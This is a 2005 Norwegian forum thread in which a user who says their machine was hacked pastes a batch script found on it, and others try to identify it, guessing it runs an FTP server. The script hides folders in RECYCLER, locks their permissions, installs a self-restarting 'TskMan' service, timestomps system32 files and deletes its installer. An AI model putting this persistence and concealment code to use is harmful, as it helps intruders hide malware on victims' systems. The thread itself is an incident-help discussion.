attrib "y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=Y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskz

if not exist "z:\" (goto install)

if not exist "z:\RECYCLER" mkdir "z:\RECYCLER" | attrib "z:\RECYCLER" +s +h

if exist "z:\RECYCLER" mkdir "z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=Z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:install

"%systemroot%\system32\TskMan.exe" -install

settimedate "%systemroot%\system32\TskMan.exe"

settimedate "%systemroot%\system32\chkdrv.vxd"

settimedate "%systemroot%\system32\carun.ocx"

settimedate "%systemroot%\system32\carun.dll"

del settimedate.exe

del caclsENG.exe

echo REGEDIT4>temp.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TskMan]>>temp.reg

echo "FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,52,00,4f,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00>>temp.reg

regedit /s temp.reg

del temp.reg

net start TskMan

del kit.exe

del install.cmd

15. februar 2005

Er du sikker på at det er denne fila da? Ser ingenting som kan ligne på en ftp-server..

TCi · 15. februar 2005

Det var litt av en fil... inmari med if setninger der

Ikke det at jeg er erfaren med dette, men ser da ut som noe ftpserver opplegg for meg iallefall.

move logon.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logonoop.txt"
move logoff.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logoffoop.txt"
move change.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\changeoop.txt"
echo y|caclsENG "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

franksun · 15. februar 2005

ja, og jeg er skifta eierskap og sletta det der, men servern er der enda

TCi · 15. februar 2005

ja, og jeg er skifta eierskap og sletta det der, men servern er der enda

Velg detaljert visning i mappene du sjekker og sorter dem etter når de er opprettet osv., kanskje det hjelper med å finne ut hvilke filer som serveren bruker...

Zethyr · 15. februar 2005

Hva gjør egentlig 'carun.ocx' ??

og hva gjør attributtene -s og -h ??

Endret 15. februar 2005 av Zethyr

er blitt hacket!

Anbefalte innlegg

Lenke til kommentar

Videoannonse

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Gjest Slettet+432

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Opprett konto

Logg inn

Hvem er aktive 0 medlemmer